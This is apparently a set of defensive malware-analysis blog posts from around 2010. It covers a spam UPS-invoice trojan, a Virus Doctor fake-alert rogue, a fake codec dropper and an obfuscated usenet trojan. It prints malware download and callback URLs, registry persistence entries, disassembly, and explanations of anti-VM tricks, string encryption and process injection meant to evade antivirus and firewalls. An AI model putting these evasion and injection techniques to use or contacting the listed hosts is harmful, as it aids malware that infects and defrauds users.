New spam hits on internet on 5th may.I have searched for the information regarding this fake mail in google.But i cant able to find any information about this so with high priority we are posting it in our blog to save online users.

Check out the body of the Fake Message below.

It is a spoofed message send from an infected Botnet to fake the user.

The malicious zip attachment file has an exe file with an icon of Microsoft word document to fake the user to run the malware.It is packed with a name "UPS_invoice_4228".

If the user run the malicious file in his system it drops a dll in the name "pgsb.lto" and this dll is loaded into the memory when system is restarted along with the explorer.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe rundll32.exe pgsb.lto csxyfxr"

The dropped file try to ping to the following address
hxxp://davidopolko.ru/migel/bb.php

The dll connect to an authenticated http server silently to download rogue antispyware InternetSecurity2010

Once the Rogue is installed to the system.It shows annoying messages and pop-ups which create the panic with the user and fakes the user to buy the Rogue AntiSpyware Software.

So user's be safe while using the internet.Don't Trust Strangers.

We use Google search for every instance in our life, it may be from gardening to university study to keeping ourselves updated. How about a search to get some details on the recent Iceland volcanic activity, and it leading to malware!! Dangerous isn't it!! But this occasionally occurs!! We need to be careful with our sites we visit from Google search results. Google is taking the maximum efforts to reduce the search results going bad! But still we need to be careful of.

Today morning, while casually searching in Google for the recent updates on the volcanic activity in my opera browser, led me to a fantasy! A Message-box saying "Warning! Your computer is at risk of malware attacks". Was happy! I caught a rouge, Fake-Alert. I thought of investigating it. Moved the message box sideways and found my Browser minimized under it. I have attached the screen-shot below in Firefox!

A message box prompting me that "Warning! Your system is at risk of malware attacks" and they assure that they will help me in strengthening my system. I was panicked. I agreed to its request by clicking OK to it. It then opened the Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scanning is complete, it started alerting me that my system has a lot of problems and need to be fixed. Check the screenshot below. The problems reported were 1. registry to be fixed, 2. Remove outdated temporary junk files, 3. Hard disk Defragmentation, 4. Disk surface analysis, 5. Webpage download speed.

I clicked the message box and it prompted me to download and save the file named "packupdate_build30_287.exe", and i did so. The MD5 of the file is

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now, I let the file execute. It started extracting.

After extracting a system scan started.

Finally,

My system is infected now!! Now panic at the extreme!! Wanting to fix it, clicked on "remove all". It was kind to open a window asking me to buy the protection for 6 months (65.00$) or 1 year (100.00$).
Should I buy?

No, without any doubts. I know that I have executed the file in a clean built WinXP SP2 Virtual Machine test environment in non-persistent mode and there is no chance of it getting infected.

I wanted to know more about its behavior and started to analyze it. This is a standalone executable is a UPX packed one. After a long times of trying to understand the packer and unpack the file, Finally found the Entry point at,

0042905C   E8 59960000      CALL packupda.004326BA

On analyzing the strings, found it could be a variant of the famous rogue, "Virus Doctor". It installs the mutex

004140D9  |> 68 48414000    PUSH 123.00404148                        ; /MutexName = "VirusDoctorInstallerMutex"

This file doesn't do anything great, it just downloads a file from "update1.savecompnow.com" with a special GET request,

GET /index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)
Host: update1.savecompnow.com


With the above requests, it downloads a file "MS64d4.exe" to "C:\Documents and Settings\All Users\Application Data\64d44d4", with hash
MD5: 67a790897462d3b238db34d53420f13a
SHA-1: 2ab7447375132b7f9367936b241913a25c4b2c71
and executes the file with Command Line Parameter
""C:\Documents and Settings\All Users\Application Data\64d44d4\MS64d4.exe" /s /i /uid=287 /ls=30 "
/s - Silent
/i - Install

If you browse this "update1.savecompnow.com" site by browser like IE or Firefox, it displays
ABBR is not properly set
SetupType is not properly set

Tip: You can save your browser from resizing by changing the javascript setting in firefox as shown below.

I was given this link

hxxp://real-tube.org/watch.php?id=172

link to be analysed sometime ago. When I accessed the link, it asked me to download and install a codec to view the video as shown below.

[Fig1 Prompt me to download Window]

As usual, i grew suspicious. I downloaded the exe and started to analysed it.

Filename: codec.exe
MD5: c356db0ffc2a6cf777873bcaa8dee442
SHA-1: eb17ef1ffc66be649fb2e24ec82d207a74e535b6

When i saw the resources, I was surprised and came to know about this malware-writer's motive instantly. I hope you will also get his motive on seeing this preview below.

[Fig2 Motive of the binary.]

Yes, It is just simple. The malware-writer has multi parted a binary into it and packed the executable. Here, I should really appreciate his patience that he had to carefully craft the binary.

After this, Loaded the binary into the disassembler, found his motive to be more simple. He has done 3 major steps a common Anti-Virus Organisation would do when it recieves a file.

1. He has added a time-based attack with RDTSC to avoid the file from being analysed by automated malware analysis system where the file will crash.
2. He has encrypted all strings and API calls.
3. Splitted the data and increased the count in resource making heuristic AV engine to ignore the file inside.

He has also added another interesting feature, which i shall explain in the post which analyse the dropped DLL.

Let me now explain every of his motive. The function at "004002D8" has a loop with RDTSC time based attack. VMWare is really bad in handling RDTSC instruction. The function returns a value which he compares with a fixed value, 0xC8. If it is less (obviously in a VM or when being stepped in a disassembler, the value returned is unpredictably large), instructions at 0x400000 is called to be executed, which eventually is a code bad enough to crash the file. (Automated analysis system records as the file doesnt execute and crashes). Checkout the image below!!!

[Fig3. Crash when executed in a VM]

I bypassed this simple attack, which lead to series of functions which decrypts strings and loads API's. His simple motive is to drop the two files in the system directory with the name "0041.DLL" and "Work.dat" and then to create a registry entry "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"LoadAppInit_DLLs" = "0041.DLL" so that this DLL will be called with every file being executed. He used the API "kernel32.EnumResourceNameA"'s Callback function to create the file easily. This API is widely used by the malware variant which KAV detects as "Trojan-Dropper.Win32.MuDrop".

I shall continue with the next post of the DLL's activity.

On 29/03/2010, our lab's collection file recieved this file named "Gorillaz_-_Plastic_Beach_[2010-MP3-Cov][Bubanee].exe" with MD5 '412d9834c54f4b5305bb94b4bc412fd2'. It was interesting to analyse this file because, the file was compiled with VC++ and it has been obfuscated with random OpCodes to confuse the Anti-Virus Engines. Similar kind of activity and obfuscation were found in files "Justified_S01E03_HDTV_XviD-XII_[eztv].exe" and "Kesha_-_Animal_[New_Album]marty70.exe". An example of such obfuscation can be found in image below.

[Fig 1 - Obfuscation Debugged with Olly Debugger]

This trojan does exactly a trojan Activity. Comes into the system mainly from usenet, with a decieving filename, and size, makes a simple common user execute it. On execution takes out data stored from the resource with name "RTDATA". Moves the resource data to another location with "RtlMoveMemory". Calls a decryption function which takes 4 Arguments, where Arg 3 value in EAX is the memory to be decrypted, Arg 2 is the key "07460E7243165A8C" as illustrated Below.

0040DAD8 |. 6A 10 PUSH 10 ; /Arg4 = 00000010
0040DADA |. 50 PUSH EAX ; |Arg3
0040DADB |. 68 50814100 PUSH [FilNam].00418150 ; |Arg2 = 00418150 ASCII "07460E7243165A8C"
0040DAE0 |. 51 PUSH ECX ; |Arg1
0040DAE1 |. E8 2A4CFFFF CALL [FilNam].00402710 ; \Gorillaz.00402710

This value is structured as an array and XOR Decrypts the resource extracted contents logic and injects the decoded bytes into the same named process by creating a process with API "CreateProcessA". All malicious activity is being done by this injected resource code.

This File is a purely custom compiled executable and does a lot of naughty stuffs. It first executes a lot of interesting code to load the import table. It checks if the current module filename is "C:\Program Files\Microsoft Common\svchost.exe", else copies the file there and finally terminates the thread with "ZwSetInformationThread" as shown below

00402E9E   6A 00            PUSH 0
00402EA0   6A 00            PUSH 0
00402EA2   6A 11            PUSH 11
00402EA4   6A FE            PUSH -2
00402EA6   FF15 87414000    CALL DWORD PTR DS:[404187]               ; ntdll.ZwSetInformationThread

Places a simple Registry RUN entry as shown below

0040254C  |. 50             PUSH EAX                                 ; /pHandle
0040254D  |. 68 3F000F00    PUSH 0F003F                              ; |Access = KEY_ALL_ACCESS
00402552  |. 6A 00          PUSH 0                                   ; |Reserved = 0
00402554  |. 68 94254000    PUSH _0015000.00402594                   ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
00402559  |. 51             PUSH ECX                                 ; |hKey
0040255A  |. FF15 86404000  CALL DWORD PTR DS:[404086]               ; \RegOpenKeyExA
00402560  |. 85C0           TEST EAX,EAX
00402562  |. 75 2E          JNZ SHORT _0015000.00402592
00402564  |. FF35 B9384000  PUSH DWORD PTR DS:[4038B9]               ; /String = "C:\Program Files\Microsoft Common\svchost.exe"
0040256A  |. FF15 733D4000  CALL DWORD PTR DS:[403D73]               ; \lstrlenA
00402570  |. 50             PUSH EAX                                 ; /BufSize
00402571  |. FF35 B9384000  PUSH DWORD PTR DS:[4038B9]               ; |Buffer = 000993B8
00402577  |. 6A 01          PUSH 1                                   ; |ValueType = REG_SZ
00402579  |. 6A 00          PUSH 0                                   ; |Reserved = 0
0040257B  |. 68 C2254000    PUSH _0015000.004025C2                   ; |ValueName = "svchost"
00402580  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; |hKey
00402583  |. FF15 AE404000  CALL DWORD PTR DS:[4040AE]               ; \RegSetValueExA

Now Creates a thread which for every 2 seconds copies this file to every drive of the system as "Autorun.exe".

The main thread continues by trying to download a file from the location shown below every "1320000. ms".

0006FF9C   008BFE48  ASCII "http://czickenpower.com/a/ld.php?v=1&rs=76487-640-1457236-236512151071260&n=1&uid=1"

The malware writer was successful in his obfuscation technique because he has tested the patience of reverse engineer like me to take 1 Full hour to understand, analyse and report about the file. I took it as a challenge and completed it. Thankyou for reading the post. Hope it was useful.

Injectors are a kind of trojan activity where they ensure that their payload is installed and executed correctly and hidden perfectly.

Currently prevalent process injectors inject infection code into other process or processes created by themselves in a suspended state. The best classic example can be Backdoor.Win32.Hupigon families variants which create for example iexplore.exe in a suspended state, then replaces the original process code with the injected malcode, and executes it. The original idea is to bypass firewall rules. Most firewalls write rules corresponding to the particular process name and path. Normally everyone would have their firewall configuration in allowed state for the iexplore.exe process. This technique is very effective in bypassing even most nowadays firewalls.

The common API sequences used by a common injector is :

CreateProcess : Creates a process in suspended state. The process can be iexplore.exe or any other legit process which serves the malware writer's purpose. In some cases, it can be even the name of the same executable.

WriteProcessMemory / ReadProcessMemory : This helps in reading and writing to and from the process space of the newly created process.

ResumeThread : Resumes the suspended create process thread handle.

Some other process injectors add other injections variants like : CreateRemoteThread or SetThreadContext to execute or hijack the code inserted in the remote process memory space.

All these were the techniques used by most malware writers during 2008-2009. We at FSB Security Labs have seen a step increase in such malwares being written. Nowadays, they have gone a step higher with the use of undocumented API's like ZwWriteVirtualMemory instead of WriteProcessMemory and ZwReadVirtualMemory instead of ReadProcessMemory. The main advantage of this technique is the simple fact of not beeing monitored by many internet security suite's available in the market. Ordinary automatic malwares detection system do not monitor these API's too unless they are upgraded.